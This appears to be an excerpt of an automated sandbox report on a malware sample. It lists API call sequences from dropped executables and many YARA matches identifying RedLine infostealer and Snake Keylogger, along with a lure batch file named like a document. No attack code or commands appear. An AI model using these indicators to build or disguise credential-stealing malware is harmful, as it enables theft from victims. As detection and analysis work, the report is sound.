              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF792DCA740
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D525E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF792D525E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D529A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF792D529A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF792D7EA7C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D80F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF792D80F58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF792D90EF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6EA8 NCryptImportKey,#360,7_2_00007FF792DC6EA8

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 16.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 22.2.xzeheenC.pif.33966478.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.33966478.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.226c0f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.226c0f08.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.34ca0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.34ca0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2dcd0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2dcd0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.3.xzeheenC.pif.2991aba0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.3.xzeheenC.pif.2991aba0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2c596478.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2c596478.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.25170000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.25170000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2c5ce790.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2c5ce790.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.226c0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.226c0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.222bb98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.222bb98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2dcd0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2dcd0000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.34ca0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.34ca0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.34d20000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.34d20000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.3255b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.3255b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.3255c896.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.3255c896.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.222bc896.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.222bc896.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 26.2.xzeheenC.pif.222bb98e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.222bb98e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.34d20000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.34d20000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.3399e790.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.3399e790.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.237be790.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.237be790.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2b37c896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2b37c896.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 26.2.xzeheenC.pif.237be790.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.237be790.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.3.xzeheenC.pif.2072dd00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.3.xzeheenC.pif.2072dd00.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 18.2.Cneehezx.PIF.21496c78.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 22.3.xzeheenC.pif.30aaea30.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.3.xzeheenC.pif.30aaea30.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.33965570.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.33965570.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2c595570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2c595570.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.222bc896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.222bc896.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 22.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 26.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2b37b98e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2b37b98e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.23786478.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.23786478.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2b37b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2b37b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.226c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.226c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.3399e790.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.3399e790.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 10.2.spoolsv.COM.2193c948.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 26.2.xzeheenC.pif.25170000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.25170000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 10.2.spoolsv.COM.219d13d8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 26.2.xzeheenC.pif.23785570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.23785570.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 22.2.xzeheenC.pif.3255b98e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.3255b98e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.34ca0f08.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.34ca0f08.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2e330000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.23786478.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2e330000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.23786478.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.226c0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.226c0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 18.2.Cneehezx.PIF.214d58a8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 22.2.xzeheenC.pif.33965570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.33965570.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.23785570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.23785570.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 18.2.Cneehezx.PIF.21496c78.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 26.3.xzeheenC.pif.2072dd00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.3.xzeheenC.pif.2072dd00.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 22.2.xzeheenC.pif.34ca0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.34ca0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.3255c896.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.3255c896.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2c595570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2c595570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.33966478.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.33966478.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.3.xzeheenC.pif.30aaea30.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.3.xzeheenC.pif.30aaea30.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000010.00000001.1581941889.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000001A.00000002.2726733311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000010.00000002.2726799985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000016.00000001.1707089110.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0000001A.00000001.1780155418.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000016.00000002.2726848233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Found large BAT file
              Source: F.O Pump Istek,Docx.batStatic file information: 2966423
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_00007FF7AB1388C0
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB138114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00007FF7AB138114
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB14BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00007FF7AB14BCF0
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB137FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,4_2_00007FF7AB137FF8
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB151538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB13898C NtQueryInformationToken,4_2_00007FF7AB13898C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB123D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,4_2_00007FF7AB123D94
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1389E4 NtQueryInformationToken,NtQueryInformationToken,4_2_00007FF7AB1389E4
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,6_2_00007FF7AB1388C0
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB138114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,6_2_00007FF7AB138114
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB14BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,6_2_00007FF7AB14BCF0
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB137FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,6_2_00007FF7AB137FF8
